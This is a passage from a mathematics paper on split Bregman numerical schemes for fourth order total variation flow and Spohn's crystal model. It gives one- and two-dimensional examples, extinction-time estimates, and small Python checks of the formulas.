\dfrac{5}{|x-1/2|}-10(1+\log5)&\mbox{otherwise.}
\end{array}\right.
\end{equation}
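The constant value $10(4-\log 5)$ on the plateau is such that $u^0$ has zero average, as required for $u^0$ to belong to $H^{-1}_{\mathrm{av}}(\mathbb{T})$; this can be verified numerically with a simple midpoint rule:

```python
import math

def u0(x):
    # Initial condition of Example 1 (plateau of width 1/5 around x = 1/2).
    r = abs(x - 0.5)
    if r <= 0.1:
        return 10.0 * (4.0 - math.log(5.0))
    return 5.0 / r - 10.0 * (1.0 + math.log(5.0))

# Midpoint rule on [0, 1]: the average of u0 should vanish.
M = 100000
mean = sum(u0((j + 0.5) / M) for j in range(M)) / M
print(abs(mean) < 1e-6)  # True
```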
Note that a similar example is computed in \cite{GMR19}. They essentially apply the matrix $J$ and compute the gradient flow problem without the split Bregman method. Their scheme requires $\tau = \lambda^{-1} = O(h^5)$ for the $H^{-1}_{\mathrm{av}}$ fidelity.
We check the difference between $K=J$ and $K=H$. Figure \ref{Fig:example3} shows two numerical results with the same parameters $N=40$, $\lambda=h^{-3}$ and $\mu=5h^{-1}$.
Numerical results $\textbf{u}^k\in\mathbb{R}^{N-1}$ are represented as piecewise constant functions $u_h^k\in V_{h0}$.
They differ because the matrix $J$ is obtained from the discrete gradient and the discrete inverse Laplacian. This difference is expected to be small for sufficiently small $h$.
Figure \ref{Fig:gradient_flow} shows the evolution of numerical solutions for $N=200$, $\lambda=h^{-3}$ and $\mu=5h^{-1}$. We infer from these results that \eqref{Scheme:SB1} can provide sufficiently accurate results.
\subsection{Example 2: Discontinuity and symmetry}
Our second numerical example for \eqref{Eq:GradientFlow} is
\begin{equation}
\label{Eq:initial_data}
u^0(x) = \left\{\begin{array}{ll}
-a(1/4-r)^3&\mbox{if }0<x<r\mbox{ or }1-r<x<1,\\
a(x-1/4)^3&\mbox{if }r<x<1/2-r,\\
a(1/4-r)^3&\mbox{if }1/2-r<x<1/2+r\\
-a(x-3/4)^3&\mbox{if }1/2+r<x<1-r,
\end{array}\right.
\end{equation}
where $a = 450$ and $r=1/15$.
In \cite{GG10}, a class of initial data including \eqref{Eq:initial_data} has been studied analytically. They rigorously proved that the solution becomes discontinuous instantaneously, and their analysis gives an exact profile of the fourth order gradient flow. Note that, by uniqueness of the solution, the symmetry of the initial profile is preserved during the evolution.
We can check that our numerical result reproduces the discontinuity and symmetry approximately (see Figures \ref{Fig:grad41} and \ref{Fig:grad42}). We use $K=J$, $N=200$, $\lambda=25h^{-3}$ and $\mu=15h^{-1}$. Furthermore, we note that we can easily compute until $\textbf{u}^k\approx \textbf{0}$, because our scheme is stable for $\tau=\lambda^{-1}=O(h^3)$.
\begin{figure}[tb]
\centering
\subfloat[][Evolution of numerical result]{\includegraphics[clip,scale=.55]{plot_gradient_flow4.pdf}\label{Fig:grad41}}
\subfloat[][Evolution of numerical result around $u^k\approx0$]{\includegraphics[clip,scale=.55]{plot_gradient_flow4-2.pdf}\label{Fig:grad42}}
\caption{Second numerical examples of the gradient flow.}
\label{Fig:gradient_flow2}
\end{figure}
\subsection{Example 3: Extinction time}
Our third example for \eqref{Eq:GradientFlow} is
\begin{equation}
u^0(x) = -\cos(2\pi x),
\end{equation}
which gives
\begin{equation}
\|u^0\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})} = \dfrac{1}{2\sqrt{2}\pi}.
\end{equation}
Figure \ref{Fig:gradient_flow3} shows the evolution of the numerical solution for the third example. We use $N=200$, $\lambda=20h^{-3}$ and $\mu=30h^{-1}$ for Figure \ref{Fig:gradient_flow3}.
Recall that our numerical scheme can compute the evolution until $\textbf{u}^k\approx \textbf{0}$ easily. Furthermore, applying the extinction time estimate \cite[Theorem 3.11]{GK11} to the one-dimensional torus implies
\begin{equation}
T^*(u^0) \le C^*\|u^0\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})},
\end{equation}
where $T^*(u^0)$ is the extinction time for the initial condition $u^0\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ and the constant $C^*$ satisfies $\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\le C^*\int_{\mathbb{T}}|Df|$ for all $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$. It is easy to check that
\begin{equation}
\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})} = \left(\displaystyle\sum_{\xi\neq0}\dfrac{1}{4\pi^2}\xi^{-2}|\widehat{f}_T(\xi)|^2\right)^{1/2} \le \dfrac{1}{2\pi}\|f\|_{L^2(\mathbb{T})} \le \dfrac{1}{2\pi}\|f\|_{L^{\infty}(\mathbb{T})} \le\dfrac{1}{2\pi}\int_{\mathbb{T}}|Df|
\end{equation}
for all $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$.
Therefore, the extinction time for $u^0(x) = -\cos(2\pi x)$ can be estimated as
\begin{equation}
T^*(u^0) \le \dfrac{1}{4\sqrt{2}\pi^2} \approx 1.7911224 \times 10^{-2}.
\end{equation}
The numerical solution is expected to be ``extinct'' in
\begin{equation}
\label{Eq:ExtinctionTime}
k \le \dfrac{T^*(u^0)}{\tau} \lessapprox 1.7911224\tau^{-1}\times 10^{-2}.
\end{equation}
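The numerical value of the bound can be reproduced directly (a check of the arithmetic only, with $C^*=1/(2\pi)$ and $\|u^0\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}=1/(2\sqrt{2}\pi)$ as derived above):

```python
import math

norm_u0 = 1.0 / (2.0 * math.sqrt(2.0) * math.pi)  # ||u^0||_{H^{-1}_av} for -cos(2 pi x)
C_star = 1.0 / (2.0 * math.pi)                    # admissible constant C*
T_star_bound = C_star * norm_u0                   # = 1/(4*sqrt(2)*pi^2)
print(T_star_bound)  # ~0.0179112
```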
\begin{table}[tb]
\centering
\begin{tabular}{|c|c|c|c|c|c|}
\hline
parameters & $\tau$ & $T^*(u^0)/\tau\lessapprox$ & $\|\textbf{u}^k\|_{\infty}< 10^{-4}$ & $\|\textbf{u}^k\|_{\infty}< 10^{-6}$ & $\|\textbf{u}^k\|_{\infty}< 10^{-8}$ \rule[0mm]{0mm}{5mm}\\\hline\hline
$N=100$, $\lambda=h^{-3}$& $10^{-6}$ &17911&4032&41769&135755 \rule[0mm]{0mm}{5mm}\\\hline
$N=100$, $\lambda=10h^{-3}$&$10^{-7}$ &179112&40311&60579&333015 \rule[0mm]{0mm}{5mm}\\\hline
$N=200$, $\lambda=10h^{-3}$&$1.25\times 10^{-8}$ &1432898&322491&592634&1267927 \rule[0mm]{0mm}{5mm}\\\hline
\end{tabular}
\caption{Time step $k$ which satisfies $\|\textbf{u}^k\|_{\infty}<10^{-4}$, $10^{-6}$ and $10^{-8}$.}
\label{Table:ExtinctionTime}
\end{table}
Table \ref{Table:ExtinctionTime} shows the time step number $k$ such that $\|\textbf{u}^k\|_{\infty}<10^{-4}$, $10^{-6}$ and $10^{-8}$ for each set of parameters. This result shows that we can achieve $\|\textbf{u}^k\|_{\infty}\lessapprox \tau$ within the number of iterations expected from \eqref{Eq:ExtinctionTime}; however, more iterations are required to obtain smaller $\|\textbf{u}^k\|_{\infty}$.
\begin{figure}[tb]
\centering
\subfloat[][Fourth order total variation flow]{\includegraphics[clip,scale=.7]{plot_extinction2.pdf}\label{Fig:gradient_flow3}}
\subfloat[][Spohn's fourth order model on $\mathbb{T}$]{\includegraphics[clip,scale=.7]{plot_gradient_flow_crystal.pdf}\label{Fig:gradcry}}
\caption{Numerical results for $u^0(x) = -\cos(2\pi x)$.}
\label{Fig:cos_results}
\end{figure}
\subsection{Example 4: Spohn's model}
Our fourth example is split Bregman framework for Spohn's fourth order model \eqref{Eq:SpohnModel}, which is described in Section \ref{Sec:Spohn}.
Recall that we suppose that $p=3$ in this paper. Therefore we can apply the shrinkage operator \eqref{Eq:Shrink_for_Spohn} to split Bregman framework for Spohn's model.
Figure \ref{Fig:gradcry} shows the numerical example for $u^0(x) = -\cos(2\pi x)$, $\beta = 0.5$, $N=200$, $\lambda=50h^{-3}$ and $\mu=30h^{-1}$.
\section{Two dimensional case}
\label{Sec:TwoDim}
The fourth order total variation flow and Spohn's model on the two dimensional torus $\mathbb{T}^2$ can be computed in a similar way to the one dimensional case.
We can define $L^2_{\mathrm{av}}(\mathbb{T}^2)$, $H^1_{\mathrm{av}}(\mathbb{T}^2)$, $H^{-1}_{\mathrm{av}}(\mathbb{T}^2)$ and $(-\Delta_{\mathrm{av}})^{-1}:H^{-1}_{\mathrm{av}}(\mathbb{T}^2)\to H^1_{\mathrm{av}}(\mathbb{T}^2)$ by the generalized Fourier transform.
First, the fourth order isotropic total variation flow introduces the constraint problem
\begin{equation}
\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}\left\{\displaystyle\int_{\mathbb{T}^2}|(d_x,d_y)|+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2 : d_x = D_xu\mbox{ and }d_y = D_yu\right\},
\end{equation}
where $D_x$ and $D_y$ are the distributional derivatives with respect to each variable. Note that
\begin{equation}
\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2=\|\nabla_x(-\Delta_{\mathrm{av}})^{-1}(u-f)\|_{L^2(\mathbb{T}^2)}^2+\|\nabla_y(-\Delta_{\mathrm{av}})^{-1}(u-f)\|_{L^2(\mathbb{T}^2)}^2,
\end{equation}
where $\nabla_x=\partial/\partial x$ and $\nabla_y = \partial/\partial y$.
Let $N_x$ and $N_y$ be the partition numbers, $h_x=1/N_x$, $h_y = 1/N_y$, $x_n = nh_x$ and $y_n = nh_y$. Furthermore, we let $Q_{n_x,n_y} = [x_{n_x-1/2},x_{n_x+1/2})\times [y_{n_y-1/2},y_{n_y+1/2})$ and $\widehat{Q}_{n_x,n_y} = [x_{n_x-1},x_{n_x})\times [y_{n_y-1},y_{n_y})$. Then we consider the space of piecewise constant functions
\begin{subequations}
\begin{align}
V_h &= \left\{v_h :\mathbb{T}^2\to\mathbb{R} : v_h|_{Q_{n_x,n_y}}\in \mathbb{P}_0(Q_{n_x,n_y})\mbox{ for all }n_x,n_y\right\},\\
V_{h0} &= \left\{v_h = \displaystyle\sum_{n_x=1,n_y=1}^{N_x,N_y}v_{n_x,n_y}\boldsymbol{1}_{Q_{n_x,n_y}}\in V_h : \sum_{n_x=1,n_y=1}^{N_x,N_y}v_{n_x,n_y}=0\right\},\\
\widehat{V}_h &= \left\{d_h : \Omega\to\mathbb{R} : d_h|_{\widehat{Q}_{n_x,n_y}}\in\mathbb{P}_0(\widehat{Q}_{n_x,n_y})\mbox{ for all }n_x,n_y\right\},
\end{align}
\end{subequations}
where $\Omega = [0,1)^2$. Any element $d_h\in \widehat{V}_h$ is described as $d_h = \sum_{n_x,n_y}d_{n_x,n_y}\boldsymbol{1}_{\widehat{Q}_{n_x,n_y}}$.
Let
\begin{subequations}
\begin{align}
\widetilde{\textbf{v}} &= (v_{1,1},\dots,v_{N_x,1},v_{1,2},\dots,v_{N_x,2},\dots,v_{N_x-1,N_y}, v_{N_x,N_y})^{\mathrm{T}}\in\mathbb{R}^{N_xN_y}\\
\textbf{v} &= (v_{1,1},\dots,v_{N_x,1},v_{1,2},\dots,v_{N_x,2},\dots,v_{N_x-1,N_y})^{\mathrm{T}}\in\mathbb{R}^{N_xN_y-1}\\
\textbf{d} &= (d_{1,1},\dots,d_{N_x,1},d_{1,2},\dots,d_{N_x,2},\dots,d_{N_x,N_y})^{\mathrm{T}}\in\mathbb{R}^{N_xN_y}
\end{align}
\end{subequations}
for $v_h\in V_{h0}$ and $d_h\in \widehat{V}_h$. We define $D_{xh},D_{yh}:V_{h0}\to\widehat{V}_h\cap L^2_{\mathrm{av}}(\Omega)$ as
\begin{equation}
D_{xh}v_h = \displaystyle\sum_{n_x,n_y}(v_{n_x,n_y}-v_{n_x-1,n_y})\boldsymbol{1}_{Q_{n_x,n_y}},\quad D_{yh}v_h = \sum_{n_x,n_y}(v_{n_x,n_y}-v_{n_x,n_y-1})\boldsymbol{1}_{Q_{n_x,n_y}}.
\end{equation}
This gives
\begin{subequations}
\begin{align}
\|d_{xh}-D_{xh}u_h\|_{L^2(\Omega)}^2 &= h_xh_y\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}\|_2^2,\\
\|d_{yh}-D_{yh}u_h\|_{L^2(\Omega)}^2 &= h_xh_y\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}\|_2^2,
\end{align}
\end{subequations}
where $R_{N_xN_y}\in\mathbb{R}^{(N_xN_y)\times(N_xN_y-1)}$ is defined as equation \eqref{Def:R} and $\nabla_{xh}$, $\nabla_{yh}$ are the discrete gradient
\begin{equation}
\nabla_{xh} = h_x^{-1}I_{N_y}\otimes S_{N_x},\quad \nabla_{yh}=h_y^{-1}S_{N_y}\otimes I_{N_x},
\end{equation}
where $I_N\in\mathbb{R}^{N\times N}$ is the identity matrix and $\otimes$ is the Kronecker product.
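The Kronecker-product structure is easy to check numerically. The sketch below builds $\nabla_{xh}$ and $\nabla_{yh}$ for the ordering $v_{1,1},\dots,v_{N_x,1},v_{1,2},\dots$ used above, assuming $S_N$ is the periodic backward-difference matrix (the paper's exact $S_N$ may differ in orientation):

```python
import numpy as np

def S(N):
    # Periodic backward-difference matrix: (S v)_n = v_n - v_{n-1 mod N}.
    return np.eye(N) - np.roll(np.eye(N), 1, axis=0)

Nx, Ny = 4, 3
hx, hy = 1.0 / Nx, 1.0 / Ny
grad_x = (1.0 / hx) * np.kron(np.eye(Ny), S(Nx))   # h_x^{-1} I_{N_y} (x) S_{N_x}
grad_y = (1.0 / hy) * np.kron(S(Ny), np.eye(Nx))   # h_y^{-1} S_{N_y} (x) I_{N_x}

# With x the fast index, grad_x differences neighbours within each grid row and
# grad_y differences corresponding entries of adjacent rows; both annihilate
# constants, consistent with the periodic boundary condition.
print(np.allclose(grad_x @ np.ones(Nx * Ny), 0.0),
      np.allclose(grad_y @ np.ones(Nx * Ny), 0.0))  # True True
```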
Then our discretized problem is described as
\begin{equation*}
\begin{array}{rl}
\displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in \mathbb{R}^{N_xN_y-1},\textbf{d}_x, \textbf{d}_y\in \mathbb{R}^{N_xN_y}}&\Biggl\{\|\textbf{d}_{xy}\|_1+\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\\
&\qquad +\dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}\|_2^2+\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}\|_2^2\right)\Biggr\},
\end{array}
\end{equation*}
where $\textbf{d}_{xy}\in\mathbb{R}^{N_xN_y}$ is defined as
\begin{equation}
d_{xy,n_x,n_y} = \sqrt{d_{x,n_x,n_y}^2 + d_{y,n_x,n_y}^2}\mbox{ for all }1\le n_x\le N_x\mbox{ and }1\le n_y\le N_y,
\end{equation}
and $K_x, K_y\in\mathbb{R}^{(N_xN_y)\times(N_xN_y-1)}$ are deduced from $\nabla_x(-\Delta_{\mathrm{av}})^{-1}$ and $\nabla_y(-\Delta_{\mathrm{av}})^{-1}$, respectively. For example, we can approximate the inverse Laplacian by using
\begin{equation}
(-\Delta_{\mathrm{av}})_h = L_{N_xN_y}(\nabla_{xh}^{\mathrm{T}}\nabla_{xh}+\nabla_{yh}^{\mathrm{T}}\nabla_{yh})R_{N_xN_y}.
\end{equation}
This yields that our first scheme for two dimensional case is described as $K_x=J_x$ and $K_y=J_y$, where
\begin{equation}
J_x = \nabla_{xh}R_{N_xN_y}(-\Delta_{\mathrm{av}})_h^{-1},\quad J_y = \nabla_{yh}R_{N_xN_y}(-\Delta_{\mathrm{av}})_h^{-1}.
\end{equation}
If we let $h_x=h_y=h$, then it is required that $\lambda = O(h^{-4})$ and $\mu=O(h^{-2})$.
The split Bregman framework gives
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
&\begin{aligned}
\textbf{u}^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N_xN_y-1}}&\left\{\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\right.\\
&\qquad + \dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x^k-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y^k-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2Du1}\\
&\begin{aligned}
(\textbf{d}_x^{k+1},\textbf{d}_y^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_x,\textbf{d}_y\in\mathbb{R}^{N_xN_y}}&\left\{\|\textbf{d}_{xy}\|_1+\dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\right.\\
&\left.\left.\qquad+\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2Dd1}\\
&\boldsymbol{\alpha}_x^{k+1} = \boldsymbol{\alpha}_x^k-\textbf{d}_x^{k+1}+h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1},\quad\boldsymbol{\alpha}_y^{k+1} = \boldsymbol{\alpha}_y^k-\textbf{d}_y^{k+1}+h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1},
\end{empheq}
\end{subequations}
where $\textbf{f}\in\mathbb{R}^{N_xN_y-1}$ is given data or $\textbf{f}=\textbf{u}^k$, $\boldsymbol{\alpha}_x^0=\boldsymbol{\alpha}_y^0 = \textbf{0}$, $\textbf{u}^0$ is given as $\textbf{0}$ or as the initial condition, and $\textbf{d}_x^0 = h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^0$, $\textbf{d}_y^0 = h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^0$.
Note that equation \eqref{Eq:2Dd1} has essentially the same form as in the split Bregman framework for the second order isotropic problem considered in \cite{GO09}.
The Euler-Lagrange equation for equation \eqref{Eq:2Dd1} yields
\begin{subequations}
\begin{align}
\dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|}+\mu h_xh_y\left(\textbf{d}_x^{k+1}-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^k\right)_n=0,\label{Eq:Isotropic_ite_dx}\\
\dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|}+\mu h_xh_y\left(\textbf{d}_y^{k+1}-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^k\right)_n=0\label{Eq:Isotropic_ite_dy}
\end{align}
\end{subequations}
for all $n=1,\dots, N_xN_y$.
We consider the approximation
\begin{equation}
\label{Eq:2D_singular_approx}
\dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|} \approx \dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{x}^{k+1})_n|}\cdot\dfrac{|s_{x,n}^k|}{s_n^k},\quad\dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|} \approx \dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{y}^{k+1})_n|}\cdot\dfrac{|s_{y,n}^k|}{s_n^k},
\end{equation}
where
\begin{equation*}
s_n^k = \sqrt{(s_{x,n}^k)^2+(s_{y,n}^k)^2},\quad s_{x,n}^k = (h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}+\boldsymbol{\alpha}_x^k)_n,\quad s_{y,n}^k = (h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}+\boldsymbol{\alpha}_y^k)_n.
\end{equation*}
Substituting them into equations \eqref{Eq:Isotropic_ite_dx} and \eqref{Eq:Isotropic_ite_dy} gives the following shrinkage formulas, which are equivalent to those of \cite[Section 4.1]{GO09}:
\begin{equation*}
(d_x^{k+1})_n = \dfrac{s_{x,n}^k}{|s_{x,n}^k|}\max\left\{|s_{x,n}^k|-\dfrac{|s_{x,n}^k|}{\mu h_xh_ys_n^k},0\right\},\quad (d_y^{k+1})_n = \dfrac{s_{y,n}^k}{|s_{y,n}^k|}\max\left\{|s_{y,n}^k|-\dfrac{|s_{y,n}^k|}{\mu h_xh_ys_n^k},0\right\}.
\end{equation*}
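These componentwise formulas can be rewritten in the coupled form $d_x = (s_x/s)\max\{s - 1/(\mu h_xh_y), 0\}$ (and similarly for $d_y$), which shrinks the magnitude $s=\sqrt{s_x^2+s_y^2}$ while keeping the direction. A vectorized sketch, with the convention $d=0$ where $s=0$:

```python
import numpy as np

def shrink_isotropic(sx, sy, mu_hh):
    # Coupled 2D shrinkage (mu_hh = mu * h_x * h_y): shrink the magnitude
    # s = |(s_x, s_y)| by 1/mu_hh and keep the direction; equivalent to the
    # componentwise formulas derived from the Euler-Lagrange equations.
    s = np.sqrt(sx**2 + sy**2)
    scale = np.maximum(s - 1.0 / mu_hh, 0.0) / np.where(s > 0.0, s, 1.0)
    return scale * sx, scale * sy

dx, dy = shrink_isotropic(np.array([3.0, 0.1]), np.array([4.0, 0.1]), 1.0)
print(dx, dy)  # [2.4 0. ] [3.2 0. ]
```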
Figure \ref{Fig:2D_Isotropic} shows the numerical result of fourth order isotropic total variation flow \eqref{Eq:FourthOrderTVFlow} in $\mathbb{T}^2$ with initial data $u^0(x,y) = x(x-1)y(y-1)-1/36$. We use $N_x=N_y=40$, $\lambda=5h^{-4}$ and $\mu=20h^{-2}$.
Next, we consider the fourth order anisotropic total variation flow
\begin{equation}
u_t = -\Delta\left(\operatorname{div}\left(\dfrac{\nabla_xu}{|\nabla_xu|},\dfrac{\nabla_yu}{|\nabla_yu|}\right)\right).
\end{equation}
\begin{figure}[H]
\centering
\subfloat[][Fourth order isotropic total variation flow]{\includegraphics[clip,scale=1.5]{2Dplot_isotropic.png}\label{Fig:2D_Isotropic}}
\\
\subfloat[][Fourth order anisotropic total variation flow]{\includegraphics[clip,scale=1.5]{2Dplot_anisotropic.png}\label{Fig:2D_Anisotropic}}
\\
\subfloat[][Spohn's fourth order model on $\mathbb{T}^2$]{\includegraphics[clip,scale=1.5]{2Dplot_Spohn.png}\label{Fig:2D_Spohn}}
\caption{Numerical results of two-dimensional problems.}
\end{figure}
\noindent
Letting $F(u) = \int_{\mathbb{T}^2}\left(|D_xu|+|D_yu|\right)$ implies that formally we have
\begin{align*}
\left(\Delta\left(\operatorname{div}\left(\dfrac{\nabla_xu}{|\nabla_xu|},\dfrac{\nabla_yu}{|\nabla_yu|}\right)\right),v-u\right)_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)} &= \left(-\operatorname{div}\left(\dfrac{\nabla_xu}{|\nabla_xu|},\dfrac{\nabla_yu}{|\nabla_yu|}\right),v-u\right)_{L^2_{\mathrm{av}}(\mathbb{T}^2)}\\
&= \displaystyle\int_{\mathbb{T}^2}\left(\dfrac{\nabla_xu\overline{\nabla_xv}}{|\nabla_xu|}-|\nabla_xu|+\dfrac{\nabla_yu\overline{\nabla_yv}}{|\nabla_yu|}-|\nabla_yu|\right)\\
&\le F(v)-F(u),
\end{align*}
therefore $u_t\in-\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)} F$. We apply the backward Euler method and obtain
\begin{equation}
u^{k+1} = \mathop{\mathrm{argmin}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}\left\{\displaystyle\int_{\mathbb{T}^2}\left(|D_xu|+|D_yu|\right)+\dfrac{1}{2\tau}\|u-u^k\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2\right\},
\end{equation}
which introduces the constraint problem
\begin{equation}
\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}\left\{\displaystyle\int_{\mathbb{T}^2}\left(|d_x|+|d_y|\right)+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2 : d_x = D_xu\mbox{ and }d_y = D_yu\right\},
\end{equation}
which, combined with the split Bregman framework, gives
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
&\begin{aligned}
\textbf{u}^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N_xN_y-1}}&\left\{\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\right.\\
&\qquad + \dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x^k-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y^k-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2Du2}\\
&\textbf{d}_x^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_x\in\mathbb{R}^{N_xN_y}}\left\{\|\textbf{d}_x\|_1+\dfrac{\mu h_xh_y}{2}\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^{k}\|_2^2\right\}\label{Eq:2D_anisotropic_dx},\\
&\textbf{d}_y^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_y\in\mathbb{R}^{N_xN_y}}\left\{\|\textbf{d}_y\|_1+\dfrac{\mu h_xh_y}{2}\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^{k}\|_2^2\right\}\label{Eq:2D_anisotropic_dy},\\
&\boldsymbol{\alpha}_x^{k+1} = \boldsymbol{\alpha}_x^k-\textbf{d}_x^{k+1}+h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1},\quad\boldsymbol{\alpha}_y^{k+1} = \boldsymbol{\alpha}_y^k-\textbf{d}_y^{k+1}+h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}.
\end{empheq}
\end{subequations}
We can apply the shrinking method \eqref{Op:shrink} to equations \eqref{Eq:2D_anisotropic_dx} and \eqref{Eq:2D_anisotropic_dy}.
Figure \ref{Fig:2D_Anisotropic} presents the evolution of fourth order anisotropic total variation flow for $u^0(x,y) = x(x-1)y(y-1)-1/36$, $N_x=N_y=40$, $\lambda=5h^{-4}$ and $\mu=20h^{-2}$.
For the second order anisotropic total variation flow, \L asica, Moll and Mucha \cite{LMM17} considered a rectangular domain $\Omega\subset\mathbb{R}^2$ or $\Omega=\mathbb{R}^2$ and rigorously proved that if the initial profile is piecewise constant, then the exact solution is piecewise constant.
Our numerical experiment in Figure \ref{Fig:2D_Anisotropic} suggests that their theoretical result also holds for the fourth order anisotropic total variation flow.
Finally, we consider two dimensional Spohn's fourth order model. The split Bregman framework provides
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
&\begin{aligned}
\textbf{u}^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N_xN_y-1}}&\left\{\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\right.\\
&\qquad + \dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x^k-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y^k-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\\
&\begin{aligned}
(\textbf{d}_x^{k+1},\textbf{d}_y^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_x,\textbf{d}_y\in\mathbb{R}^{N_xN_y}}&\left\{\beta\|\textbf{d}_{xy}\|_1+\dfrac{1}{p}\|\textbf{d}_{xy}\|_p^p\right.\\
&\qquad+\dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2DSpohn_d}\\
&\boldsymbol{\alpha}_x^{k+1} = \boldsymbol{\alpha}_x^k-\textbf{d}_x^{k+1}+h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1},\quad\boldsymbol{\alpha}_y^{k+1} = \boldsymbol{\alpha}_y^k-\textbf{d}_y^{k+1}+h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}.
\end{empheq}
\end{subequations}
The Euler-Lagrange equation for \eqref{Eq:2DSpohn_d} can be approximated by equation \eqref{Eq:2D_singular_approx}.
